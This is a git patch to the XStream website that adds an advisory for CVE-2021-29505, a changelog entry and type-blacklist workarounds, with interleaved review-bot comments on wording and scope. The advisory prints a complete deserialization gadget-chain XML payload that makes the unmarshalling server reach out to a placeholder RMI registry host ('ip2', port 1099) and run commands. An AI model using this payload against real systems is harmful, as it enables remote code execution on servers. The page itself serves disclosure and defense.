From 24fac82191292c6ae25f94508d28b9823f83624f Mon Sep 17 00:00:00 2001 From: joehni Date: Mon, 10 May 2021 22:56:17 +0200 Subject: [PATCH] Add description of CVE-2021-29505 and bug fix. --- .../src/content/CVE-2021-29505.html | 119 ++++++++++++++++++ xstream-distribution/src/content/changes.html | 19 ++- .../src/content/security.html | 18 ++- xstream-distribution/src/content/website.xml | 1 + 4 files changed, 152 insertions(+), 5 deletions(-) create mode 100644 xstream-distribution/src/content/CVE-2021-29505.html diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html new file mode 100644 index 000000000..378eab8b6 --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-29505.html @@ -0,0 +1,119 @@ + + + + CVE-2021-29505 + + + +

Vulnerability

+ +

CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.

+ +

Affected Versions

+ +

All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is + affected, who followed the recommendation to setup XStream's security + framework with a whitelist limited to the minimal required types.

+ +

Description

+ +

The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of a local command on the server.

+ +

Steps to Reproduce

+ +

Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and + unmarshal it again with XStream:

+
<java.util.PriorityQueue serialization='custom'>
+  <unserializable-parents/>
+  <java.util.PriorityQueue>
+    <default>
+      <size>2</size>
+    </default>
+    <int>3</int>
+    <javax.naming.ldap.Rdn_-RdnEntry>
+      <type>12345</type>
+      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
+      </value>
+    </javax.naming.ldap.Rdn_-RdnEntry>
+    <javax.naming.ldap.Rdn_-RdnEntry>
+      <type>12345</type>
+      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+          <parsedMessage>true</parsedMessage>
+          <soapVersion>SOAP_11</soapVersion>
+          <bodyParts/>
+          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+            <attachmentsInitialized>false</attachmentsInitialized>
+            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+              <soapPart/>
+              <mm>
+                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
+                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
+                      <names>
+                        <string>aa</string>
+                        <string>aa</string>
+                      </names>
+                      <ctx>
+                        <environment/>
+                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
+                          <java.rmi.server.RemoteObject>
+                            <string>UnicastRef</string>
+                            <string>ip2</string>
+                            <int>1099</int>
+                            <long>0</long>
+                            <int>0</int>
+                            <short>0</short>
+                            <boolean>false</boolean>
+                          </java.rmi.server.RemoteObject>
+                        </registry>
+                        <host>ip2</host>
+                        <port>1099</port>
+                      </ctx>
+                    </candidates>
+                  </aliases>
+                </it>
+              </mm>
+            </multiPart>
+          </sm>
+        </message>
+      </value>
+    </javax.naming.ldap.Rdn_-RdnEntry>
+  </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+
+
XStream xstream = new XStream();
+xstream.fromXML(xml);
+
+ +

As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.

+ +

Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.

+ +

Impact

+ +

The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by + manipulating the processed input stream.

+ +

Workarounds

+ +

See workarounds for the different versions covering all CVEs.

+ +

Credits

+ +

V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.

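Review bot: the Steps to Reproduce in the new CVE-2021-29505.html never explain `ip2` and `1099`. The payload bottoms out in a `sun.rmi.registry.RegistryImpl_Stub` whose `UnicastRef` is built from `<string>ip2</string>`, `<int>1099</int>` and the surrounding `<host>ip2</host>` / `<port>1099</port>`, so a reader who pastes the XML exactly as printed has nothing at that address, which does not square with "As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host." State that `ip2` is a placeholder for a host the tester controls and what the tester must have running there, or weaken the sentence to what the snippet alone demonstrates. Three wording issues in the same file: under Affected Versions, "All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation" reads better as "All versions up to and including 1.4.16 are affected when XStream is used out of the box. Users who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types are not affected."; under Description, "based on these type information" should be "based on this type information", and the comma in "inject objects, that result in execution" should go; under Impact, "may allow a remote attacker has sufficient rights to execute commands of the host" is missing a word before "has" (presumably "who"), and "commands of the host" should be "commands on the host".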
+ + + diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html index 19a8e2172..4cfe0f5a2 100644 --- a/xstream-distribution/src/content/changes.html +++ b/xstream-distribution/src/content/changes.html @@ -101,11 +101,26 @@

Stream compatibility

  • No support for Hibernate 3 collections.
  • - + +

    This maintenance release addresses the security vulnerability + CVE-2021-29505, when unmarshalling with XStream instances using an uninitialized + security framework.

    + +

    Stream compatibility

    + +

    1.4.16

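Review bot: this changes.html entry says the maintenance release addresses CVE-2021-29505 and the commit title says "and bug fix", but all four files in the patch are documentation (CVE-2021-29505.html, changes.html, security.html, website.xml); the change to the default blacklist that actually fixes the issue is not in this commit. Land it here or reference the commit that carries it, and say in this entry what is newly denied, since readers of changes.html use it to judge whether an upgrade can reject their existing streams; the security.html hunk gives the 1.4.16 workaround as `xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });`, which is presumably what the release adds to the blacklist. Minor: "with XStream instances using an uninitialized security framework" reads better as "with XStream instances whose security framework has not been initialized".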
    diff --git a/xstream-distribution/src/content/security.html b/xstream-distribution/src/content/security.html index 1115866e1..737961e7a 100644 --- a/xstream-distribution/src/content/security.html +++ b/xstream-distribution/src/content/security.html @@ -44,11 +44,20 @@

    Documented Vulnerabilities

    Exposure (CVE) system managed by the Mitre Corporation. Following a list of the reported vulnerabilities for the different versions:

    - +
    + + + + + + + + + @@ -393,8 +402,11 @@

    Workarounds for older XStream versions

    XStream xstream = new XStream();
     // add your allowed types, type hierarchies or packages here
     
    -

    Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can +

    Users of XStream 1.4.16 who insist to use XStream default blacklist - despite that clear recommendation - can add these lines to XStream's setup code:

    +
    xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
    +
    +

    Users of XStream 1.4.15 should additionally add these lines to the lines from above:

    xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "sun.swing.SwingLazyValue", "com.sun.corba.se.impl.activation.ServerTableEntry", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
     xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
     xstream.denyTypeHierarchy(java.io.InputStream.class );
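Review bot: the new line `xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });` denies far more than the two classes the reproduction payload relies on (`com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl` and `sun.rmi.registry.RegistryImpl_Stub`): every type under `java.rmi.` and `sun.rmi.`, and any class whose name contains `.LazyEnumeration` or `.LazySearchEnumeration`. Blocking the whole packages is defensible for a blacklist, but the text should say that it is deliberate and warn that streams which legitimately carry RMI stubs (subclasses of `java.rmi.server.RemoteObject`, as the payload itself is) will now be rejected, with the whitelist the page already recommends as the only way to keep them. Note also that the patterns are written to match the complete class name (`.*` on both sides, `(?:java|sun)` at the start), so anyone adapting them must keep that shape. Grammar: "who insist to use XStream default blacklist" should be "who insist on using XStream's default blacklist".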
    @@ -402,7 +414,7 @@ 

    Workarounds for older XStream versions

    xstream.denyTypeHierarchy(javax.activation.DataSource.class ); xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
    -

    Users of XStream 1.4.13 should additionally add these two lines to the lines from above:

    +

    Users of XStream 1.4.14 and 1.4.13 should additionally add these two lines to the lines from above:

    xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
     xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
     
    diff --git a/xstream-distribution/src/content/website.xml b/xstream-distribution/src/content/website.xml index ed4df177c..7254d976a 100644 --- a/xstream-distribution/src/content/website.xml +++ b/xstream-distribution/src/content/website.xml @@ -74,6 +74,7 @@ CVE-2021-21349.htmlCVE-2021-21350.htmlCVE-2021-21351.html + CVE-2021-29505.htmlCVE-2020-26217.htmlCVE-2020-26258.htmlCVE-2020-26259.html
    CVE Description
    Version 1.4.16
    CVE-2021-29505XStream is vulnerable to a Remote Command Execution attack.
    Version 1.4.15